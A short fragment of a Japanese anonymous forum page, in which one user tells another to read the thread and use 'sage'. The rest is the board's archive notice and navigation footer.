スレ読んでないのか?
せめてsageてくれ

92 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)